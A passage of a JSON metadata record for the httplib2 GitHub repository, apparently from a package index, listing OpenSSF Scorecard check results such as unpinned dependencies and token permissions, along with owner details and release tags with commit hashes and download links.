Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36646944,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-14T02:00:06.934Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.1